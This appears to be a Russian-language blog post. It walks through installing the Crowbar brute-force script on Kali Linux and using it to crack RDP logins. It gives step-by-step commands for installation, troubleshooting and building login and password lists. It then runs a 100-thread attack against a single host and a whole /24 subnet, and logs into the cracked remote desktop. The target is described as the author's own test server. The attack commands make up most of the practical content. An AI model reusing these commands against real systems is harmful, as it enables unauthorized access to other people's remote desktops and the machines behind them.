Обзор скрипта для брутфорса Crowbar в KaliLinux.
Life-HackВчера упрямый Patator не пожелал "прогнуться" под мои желания и Господин Случай сделал для меня маленькое открытие ))
В этом месте читателю в голову пришли мысли о том, что Илон Маск уже колонизировал Марс )
Нет, мои открытия намного скромнее. Оказалось, что для семейства Линукс написан очередной скрипт для осуществления атак "грубой силой" на Python.
Встречайте, Его Величество Crowbar.
Первоначально у меня было намерение установить скрипт на удалённую машину под управлением CentOS 7. Но меня ожидала неудача. Дело в том, что я планировала проверить работу скрипта по протоколу RDP и никакие компромиссы меня не устраивали. При работе по протоколу удалённого рабочего стола работа скрипта тесно связана с утилитой xfreerdp.
Я подключалась к VDS как обычно по протоколу SSH - в этом заключалась моя вероятная ошибка.
Для успешного контакта Crowbar+ XfreeRDP на удалённой машине необходимо было подключиться по VNC либо RDP.
Но внезапно нахлынувший ночной энтузиазм таял от минуты к минуте и было принято решение сдуть пыль с ярлыка "VMware Workstation Pro" на рабочем столе локальной машины.
На установку скачанного десять месяцев назад образа KaliLinux не ушло много времени.
По-быстрому произведены первичные настройки виртуального Kali и настал момент "танцев с бубном" вокруг Crowbar
Брут Crowbar - это скрипт на питоне , который вызывает системные программы с нужными параметрами . Для брута rdp вызывается xfreerdp клиент
# apt-get install freerdp-x11
Проверка работоспособности xfreerdp
# xfreerdp --version # xfreerdp --sec nla 185.154.13.84
Вышеуказанные команды вызывают адекватную реакцию, никаких ошибок в отличие от работы на удалённой CentOS 7 не выдали, значит можно продолжить.
Клонируем скрипт Crowbar при помощи git:
# git clone https://github.com/galkan/crowbar
Заходим в папку со скриптом:
# cd crowbar
Файлу надо добавить бит исполнимости (возможно, эта команда - лишняя, но я решила подстраховаться):
# chmod +x crowbar.py
Проверим работоспособность скрипта на этом этапе. Зададим ему команду выдать справку о себе.
# python crowbar.py --help
Перед моим взором на экране монитора появилась страница справки по программе.
В этом месте возможно появление следующей ошибки:
No module named pkg_resources
Решение проблемы с ошибкой No module named pkg_resources
# yum -y update # yum -y install python-pip # pip install --upgrade pip
Или
# pip install --upgrade setuptools # pip install --upgrade distribute
Опять пробуем запустить "Хелп"
# python crowbar.py --help
Работает ))
На этом - ВСЁ.
Всё коротко и лаконично )
Создаём текстовые файлы с предполагаемым списком логинов,
а также со списком предполагаемых паролей.
Запуск скрипта питон в скрипте баш
Атаковать будем мой тестовый дедик IP 185.1хх.13.хх
Команда для атаки в моём случае должна иметь следующий вид:
# python crowbar.py -b rdp -U login.txt -C pass.txt -s IP 185.1хх.13.хх/32 -o good.txt -n 100 -t 500 -v -d
Сканирование подсети 185.1хх.13.хх/24
# python crowbar.py -b rdp -U login.txt -C pass.txt -s 185.1хх.13.хх/24 -o good.txt -n 100 -t 500 -v -d
Короткие пояснения :
-b rdp - Целевая служба. Crowbar поддерживает vnckey, openvpn, sshkey, rdp.
-n 100 - Количество задействованных потоков
-S: </path/to/file> список IP для брута
-d: Запустить nmap для того, чтобы узнать, является ли порт открытым или нет.
-v: Подробный режим, который показывает все попытки, включая неудачу.
-o good.txt -Все логи включая положительные результаты записываются в файл good.txt
После окончания атаки просматриваем файл good.txt и обнаруживает, что тестовый дедик успешно сбручен.
Подключаемся к его удалённому рабочему столу.
# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.1хх.13.хх
Успех )
В заключении статьи предлагаю к просмотру небольшой видеообзор скрипта
На этом у меня всё.Всем - спасибо ) Источник